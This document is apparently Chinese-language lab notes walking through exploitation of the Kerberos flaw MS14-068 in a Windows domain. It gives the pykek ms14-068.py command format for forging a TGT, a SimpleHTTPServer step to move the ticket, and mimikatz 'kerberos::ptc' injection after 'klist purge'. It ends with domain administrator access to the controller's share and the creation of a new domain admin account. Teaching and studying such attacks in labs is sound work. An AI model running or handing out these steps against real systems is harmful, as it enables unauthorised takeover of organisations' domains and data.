经典攻击示范.5.提权-6.后渗透阶段
MS14-068
https://docs.microsoft/en-us/security-updates/SecurityBullentins/2014/ms14-068
受影响的软件(操作系统)1
受影响的软件(操作系统)2
受影响的软件(操作系统)3
受影响的软件(操作系统)4
受影响的软件(操作系统)5
MS14-068
攻击者可能使用此漏洞执行什么操作?
攻击者可以使用此漏洞来**将未授权的域用户账户升级到域管理员账户**。成功利用此漏洞的攻击者可以模拟域内的任何用户(包括域管理员),并加入任何组。通过冒充域管理员,攻击者可以安装程序;查看、更改或者删除数据;或者在任何加入域的系统上创建新账户。
攻击者如何利用此漏洞?
经过身份验证的与用户可以向Kerberos KDC发送伪造的Kerberos票证,声明用户是域管理员。Kerberos KDC在处理来自攻击者的请求时没有正确的验证伪造票证签名,允许攻击者使用域管理员的身份访问网络上的任何资源。
哪些系统主要面临漏洞风险?
配置为充当Kerberos密钥分发中心(KDC)的域控制器主要面临风险。
*主要是配置了域控制器的Windows Server会存在漏洞。
普通账号登录win7
在域成员计算机Windows 7上尝试访问域控制器的C盘共享目录:
*由于普通域成员用户没有域管理员的权限,访问被拒绝
想要生成指定用户的票据文件,首先我们要查询到指定用户在域内的SID。
在Windows 7上使用 “whoami /user” 来查询当前登录用户的SID:
Kali在Github上下载提权脚本
https://github.com/bidord/pykek
将下载的压缩文件解压到桌面,得到完整的漏洞利用脚本及所需组件的文件夹:
注意脚本名称,在用python执行的时候不能把脚本名称输错
漏洞利用脚本命令格式:
#ms 14-068.py -u user@domain.com -s userSID -d name.domain/IP
执行脚本后,需要在Password处输入对应域账户的密码:
*在输入命令时加上参数 “-p” 并跟上对应域账户Password 的值可以省略此步骤。
成功在当前目录下生成票据文件(一般都是以TGT开头):
查看生成的票据文件:
*接下来需要将生成的票据文件拷贝到域成员计算机Windows 7上,并使用域账户登录,进行后续提权操作。
传输票据文件到Windows 7:
*在这里使用最简单的方法,Kali启用HTTP服务器,Windows 7通过网页访问Kali下载票据文件。
python -m SimpleHTTPServer 808
下载票据文件到Windows 7
MS14-068
Win7:
为了伪造会话凭证获取域管理权限,需要将生成的票据注入到当前域成员计算机的内存中。
使用工具:mimikatz
下载地址:https://github.com/gentilkiwi/mimikatz/releases
解压下载的文件,并根据自己的操作系统选择对应的版本:
将下载的票据文件放入mimikatz.exe同目录下:
mimmikatz终端不支持复制粘贴等操作,使用Windows*自带的CMD命令行更为方便。
x64目录:
清除所有本地缓存的票据凭证:C:\Users\Administrator>klist purge
使用mimikatz注入我们伪造的票据:
mimikatz.exe "kerberos::ptc TGT_user1@qytang.com.ccache"
注入成功退出
查看当前登录ID及票据凭证:C:\Users\user1>klist
测试访问域控制器C盘共享目录:
*域成员计算机已经成功得到域控制器管理员的权限!
使用Windows 7的CMD命令行在域内新建一个用户,并加入到域管理员组:
*创建成功,此账号已拥有域管理员权限!
将Windows7切换到新建的域管理员账号登录: